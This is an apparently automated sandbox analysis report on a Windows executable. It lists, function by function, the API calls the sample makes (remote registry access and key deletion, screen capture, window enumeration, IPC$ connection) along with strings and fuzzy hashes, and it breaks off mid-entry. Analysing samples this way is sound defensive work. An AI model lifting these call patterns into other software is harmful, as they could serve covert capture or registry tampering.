• Opcode Fuzzy Hash: 1c2e76688c29389a59fe8272206e19b484f5ca5cc40a1534847f6a4c01277b20
• Instruction Fuzzy Hash: A6D10172A00105DBCB00EF6AD885B7DB7B9FF45701F10845AF946AB191EB38DC4ADB62
APIs
  • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
  • Part of subcall function 0096C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
  • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096C9F1
  • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA68
  • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096B6F4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096B772
• RegDeleteValueW.ADVAPI32(?,?), ref: 0096B80A
• RegCloseKey.ADVAPI32(?), ref: 0096B87E
• RegCloseKey.ADVAPI32(?), ref: 0096B89C
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 0096B8F2
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0096B904
• RegDeleteKeyW.ADVAPI32(?,?), ref: 0096B922
• FreeLibrary.KERNEL32(00000000), ref: 0096B983
• RegCloseKey.ADVAPI32(00000000), ref: 0096B994
Strings
Similarity
• API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 146587525-4033151799
• Opcode ID: b665d699f458925101652774964d7a4599a6c04fbe2e1327c6a6ca90d102159c
• Instruction ID: c2b46c21e2ffdfd8621b3e5293ba174f24ac51e878cad8e046fccbb1aa00a534
• Opcode Fuzzy Hash: b665d699f458925101652774964d7a4599a6c04fbe2e1327c6a6ca90d102159c
• Instruction Fuzzy Hash: 24C19D31208241AFD714DF18C495F2ABBE5FF85308F14845CF4AA8B2A2DB75ED85CB92
APIs
• GetDC.USER32(00000000), ref: 009625D8
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009625E8
• CreateCompatibleDC.GDI32(?), ref: 009625F4
• SelectObject.GDI32(00000000,?), ref: 00962601
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0096266D
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 009626AC
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009626D0
• SelectObject.GDI32(?,?), ref: 009626D8
• DeleteObject.GDI32(?), ref: 009626E1
• DeleteDC.GDI32(?), ref: 009626E8
• ReleaseDC.USER32(00000000,?), ref: 009626F3
Strings
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 01fc3299d5846f8a7b2492b9e10af916cf2c63fe0ea6b0b3d386e702513f1e00
• Instruction ID: 3fc30eaa3319263ee663a4941c1dd2d8a2712dfdd6eeb3657ae414fd859fbbe3
• Opcode Fuzzy Hash: 01fc3299d5846f8a7b2492b9e10af916cf2c63fe0ea6b0b3d386e702513f1e00
• Instruction Fuzzy Hash: 5761E5B6D04219EFCF14CFA4D884EAEBBB5FF48310F20852AE559A7250D774A941DF50
APIs
• ___free_lconv_mon.LIBCMT ref: 0091DAA1
  • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D659
  • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D66B
  • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D67D
  • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D68F
  • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6A1
  • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6B3
  • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6C5
  • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6D7
  • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6E9
  • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6FB
  • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D70D
  • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D71F
  • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D731
• _free.LIBCMT ref: 0091DA96
  • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
  • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
• _free.LIBCMT ref: 0091DAB8
• _free.LIBCMT ref: 0091DACD
• _free.LIBCMT ref: 0091DAD8
• _free.LIBCMT ref: 0091DAFA
• _free.LIBCMT ref: 0091DB0D
• _free.LIBCMT ref: 0091DB1B
• _free.LIBCMT ref: 0091DB26
• _free.LIBCMT ref: 0091DB5E
• _free.LIBCMT ref: 0091DB65
• _free.LIBCMT ref: 0091DB82
• _free.LIBCMT ref: 0091DB9A
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 4915e38842f4ccd9ead14123139cd936ef954cef22be7a9a5cda37a2438848dd
• Instruction ID: 94428ffdfa8a039cd704d524d4a025e8651597409198319eb0af3758bcb051f5
• Opcode Fuzzy Hash: 4915e38842f4ccd9ead14123139cd936ef954cef22be7a9a5cda37a2438848dd
• Instruction Fuzzy Hash: 7B3148327496089FEB22AB39E945B9A77ECFF40320F114419E459DB191DB34ACE08720
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 0094369C
• _wcslen.LIBCMT ref: 009436A7
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00943797
• GetClassNameW.USER32(?,?,00000400), ref: 0094380C
• GetDlgCtrlID.USER32(?), ref: 0094385D
• GetWindowRect.USER32(?,?), ref: 00943882
• GetParent.USER32(?), ref: 009438A0
• ScreenToClient.USER32(00000000), ref: 009438A7
• GetClassNameW.USER32(?,?,00000100), ref: 00943921
• GetWindowTextW.USER32(?,?,00000400), ref: 0094395D
Strings
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
• String ID: %s%u
• API String ID: 4010501982-679674701
• Opcode ID: dc9a4c7e785257c98d1cb01251b2de08b297f309d7a6946324968f86451bde17
• Instruction ID: 986f6c1a87775f72c34eab17d503b611bab44fb9a30ac773821e170bd0345620
• Opcode Fuzzy Hash: dc9a4c7e785257c98d1cb01251b2de08b297f309d7a6946324968f86451bde17
• Instruction Fuzzy Hash: 2B919E71204606EFD719DF34C885FAAF7A8FF44354F108629FAA9D2190DB30EA55CB91
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 00944994
• GetWindowTextW.USER32(?,?,00000400), ref: 009449DA
• _wcslen.LIBCMT ref: 009449EB
• CharUpperBuffW.USER32(?,00000000), ref: 009449F7
• _wcsstr.LIBVCRUNTIME ref: 00944A2C
• GetClassNameW.USER32(00000018,?,00000400), ref: 00944A64
• GetWindowTextW.USER32(?,?,00000400), ref: 00944A9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 00944AE6
• GetClassNameW.USER32(?,?,00000400), ref: 00944B20
• GetWindowRect.USER32(?,?), ref: 00944B8B
Strings
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
• String ID: ThumbnailClass
• API String ID: 1311036022-1241985126
• Opcode ID: 522a1c9aeb8f3bbc48ac9673aae266db85e360579302919f8cb78fdac858930f
• Instruction ID: c64f8a5aeb20ee0950c40880989e5e6efd00fe04620a617f1dc2679ef3bf7274
• Opcode Fuzzy Hash: 522a1c9aeb8f3bbc48ac9673aae266db85e360579302919f8cb78fdac858930f
• Instruction Fuzzy Hash: CB91C0721082069FDB04DF14C985FAA77ECFF84718F048469FD899A196EB34ED45CBA1
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0096CC64
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0096CC8D
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0096CD48
  • Part of subcall function 0096CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0096CCAA
  • Part of subcall function 0096CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0096CCBD
  • Part of subcall function 0096CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0096CCCF
  • Part of subcall function 0096CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0096CD05
  • Part of subcall function 0096CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0096CD28
• RegDeleteKeyW.ADVAPI32(?,?), ref: 0096CCF3
Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 2734957052-4033151799
                                                                    • Opcode ID: 4c64c040c2f6c7be447a2d41e40566cc756e73ae7573645d9a75d38689e86e2e
                                                                    • Instruction ID: b6c26cd151d34971a451b29fcd88e802ee4a6a9d4e54d9f148802766501ba91c
                                                                    • Opcode Fuzzy Hash: 4c64c040c2f6c7be447a2d41e40566cc756e73ae7573645d9a75d38689e86e2e
                                                                    • Instruction Fuzzy Hash: 153160F2905129BBDB209B54DC88EFFBB7CEF46750F000569B949E2240D7349A85EAE0
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00953D40
                                                                    • _wcslen.LIBCMT ref: 00953D6D
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00953D9D
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00953DBE
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00953DCE
                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00953E55
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00953E60
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00953E6B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 1149970189-3457252023
                                                                    • Opcode ID: 098b22f55e17ede506b6a0d7e29ad7074642492b5e6fb84e21ed746c080c5513
                                                                    • Instruction ID: 5aed6c5efbbecf344659a74dec9bd93c00bce16c80197a191810a7901309da71
                                                                    • Opcode Fuzzy Hash: 098b22f55e17ede506b6a0d7e29ad7074642492b5e6fb84e21ed746c080c5513
                                                                    • Instruction Fuzzy Hash: 2A31B6B2514109ABDB21DBA1DC49FEF37BCEF88741F1040B9FA19D6091E77497888B24
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 0094E6B4
                                                                      • Part of subcall function 008FE551: timeGetTime.WINMM(?,?,0094E6D4), ref: 008FE555
                                                                    • Sleep.KERNEL32(0000000A), ref: 0094E6E1
                                                                    • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0094E705
                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0094E727
                                                                    • SetActiveWindow.USER32 ref: 0094E746
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0094E754
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0094E773
                                                                    • Sleep.KERNEL32(000000FA), ref: 0094E77E
                                                                    • IsWindow.USER32 ref: 0094E78A
                                                                    • EndDialog.USER32(00000000), ref: 0094E79B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                    • String ID: BUTTON
                                                                    • API String ID: 1194449130-3405671355
                                                                    • Opcode ID: 7e9b9c98d4cbb91d5a4859cddb77fde67ab91574368e33127df6bcf35dfb3c3f
                                                                    • Instruction ID: c0b8ffdd1d808f272a08698bfda3a06d792c96c8ff6b2b8cbba9175bf6f578d0
                                                                    • Opcode Fuzzy Hash: 7e9b9c98d4cbb91d5a4859cddb77fde67ab91574368e33127df6bcf35dfb3c3f
                                                                    • Instruction Fuzzy Hash: 322181B1628205EFEB005F30EDCAE293B6DF7543A9F101629F50AC11A1DB71AC40AB24
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0094EA5D
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0094EA73
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094EA84
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0094EA96
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0094EAA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$_wcslen
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 2420728520-1007645807
                                                                    • Opcode ID: 266d67be899b88c7a591ac6344d118f996b56e334faf8844947662e594016c27
                                                                    • Instruction ID: e76476e3c7695be19f75f0553d4933ac11448698a52cc9ae1564c16b8ddc9e41
                                                                    • Opcode Fuzzy Hash: 266d67be899b88c7a591ac6344d118f996b56e334faf8844947662e594016c27
                                                                    • Instruction Fuzzy Hash: B0117C31A9026979D720E7AADC4AEFF6A7CFBD3B04F440529B811E20D1EEB04E45C5B1
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00945CE2
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00945CFB
                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00945D59
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00945D69
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00945D7B
                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00945DCF
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00945DDD
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00945DEF
                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00945E31
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00945E44
                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00945E5A
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00945E67
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: 75bfd57fa839b2f69140c08764ec5d5486116252dd3ded27de944d5fc3348555
                                                                    • Instruction ID: 084a5013aeef9a215409fb25306542df28fb02561ff8d0ba038f72718744f5a4
                                                                    • Opcode Fuzzy Hash: 75bfd57fa839b2f69140c08764ec5d5486116252dd3ded27de944d5fc3348555
                                                                    • Instruction Fuzzy Hash: 47511CB1B10605AFDF18CFA8CD89EAEBBB9EF48300F158129F519E6291D7709E40CB50
                                                                    APIs
                                                                      • Part of subcall function 008F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008F8BE8,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 008F8FC5
                                                                    • DestroyWindow.USER32(?), ref: 008F8C81
                                                                    • KillTimer.USER32(00000000,?,?,?,?,008F8BBA,00000000,?), ref: 008F8D1B
                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00936973
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 009369A1
                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 009369B8
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,008F8BBA,00000000), ref: 009369D4
                                                                    • DeleteObject.GDI32(00000000), ref: 009369E6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 641708696-0
                                                                    • Opcode ID: e27906e6c93971089fba99e398e331b3b30203b4dcd244874499ecd760abb73a
                                                                    • Instruction ID: 5d03fcb7329f4eb67286c8164605462304129fbb53de85977e7c491df9ea1612
                                                                    • Opcode Fuzzy Hash: e27906e6c93971089fba99e398e331b3b30203b4dcd244874499ecd760abb73a
                                                                    • Instruction Fuzzy Hash: 0B619931116608EFDB259F28DA58B3977F1FB40326F54861CE286DB960CB31A990EF90
                                                                    APIs
                                                                      • Part of subcall function 008F9944: GetWindowLongW.USER32(?,000000EB), ref: 008F9952
                                                                    • GetSysColor.USER32(0000000F), ref: 008F9862
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ColorLongWindow
                                                                    • String ID:
                                                                    • API String ID: 259745315-0
                                                                    • Opcode ID: 6e2dee6afde7818651c8bb1594d138afdc202bdd58c66af49f5c85f2a2c964b9
                                                                    • Instruction ID: 5a739a74acb6ce7ac054bcbb7a0b1e57ca495185fd0d1f3186441805e81d3fe5
                                                                    • Opcode Fuzzy Hash: 6e2dee6afde7818651c8bb1594d138afdc202bdd58c66af49f5c85f2a2c964b9
                                                                    • Instruction Fuzzy Hash: A041AF71118648AFDB305F389C88BB93BA9FB46370F144629FAE6C71E1C7319981EB11
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0092F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00949717
                                                                    • LoadStringW.USER32(00000000,?,0092F7F8,00000001), ref: 00949720
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0092F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00949742
                                                                    • LoadStringW.USER32(00000000,?,0092F7F8,00000001), ref: 00949745
                                                                    • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00949866
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                    • API String ID: 747408836-2268648507
                                                                    • Opcode ID: de3a3f3cd1d0053f57b54f6daf08739b064fe5eff86ea560b14a388bb50decd7
                                                                    • Instruction ID: 2f5f8a983d3946653d54a12117176e0c91f35d94d238ee65680bc975db973458
                                                                    • Opcode Fuzzy Hash: de3a3f3cd1d0053f57b54f6daf08739b064fe5eff86ea560b14a388bb50decd7
                                                                    • Instruction Fuzzy Hash: 3B417D72804259AACB04FBE5DD86EEF7778FF56340F600025F605B2192EA646F48CB62
                                                                    APIs
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009407A2
                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009407BE
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009407DA
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00940804
                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0094082C
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00940837
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0094083C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                    • API String ID: 323675364-22481851
                                                                    • Opcode ID: cd8c0fa7db2205dbc29c67d6e5b6753e751840939d5cf209a25346ced8b1d033
                                                                    • Instruction ID: 000a703c839b1a4a1b875f7d3829f3bf3f3eaed958cac41fe35b850e6875b7d7
                                                                    • Opcode Fuzzy Hash: cd8c0fa7db2205dbc29c67d6e5b6753e751840939d5cf209a25346ced8b1d033
                                                                    • Instruction Fuzzy Hash: 12414B72C10228ABCF15EFA4DC85CEEB778FF85750F554129E915A3161EB30AE44CBA1
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00963C5C
                                                                    • CoInitialize.OLE32(00000000), ref: 00963C8A
                                                                    • CoUninitialize.OLE32 ref: 00963C94
                                                                    • _wcslen.LIBCMT ref: 00963D2D
                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00963DB1
                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00963ED5
                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00963F0E
                                                                    • CoGetObject.OLE32(?,00000000,0097FB98,?), ref: 00963F2D
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00963F40
                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00963FC4
                                                                    • VariantClear.OLEAUT32(?), ref: 00963FD8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
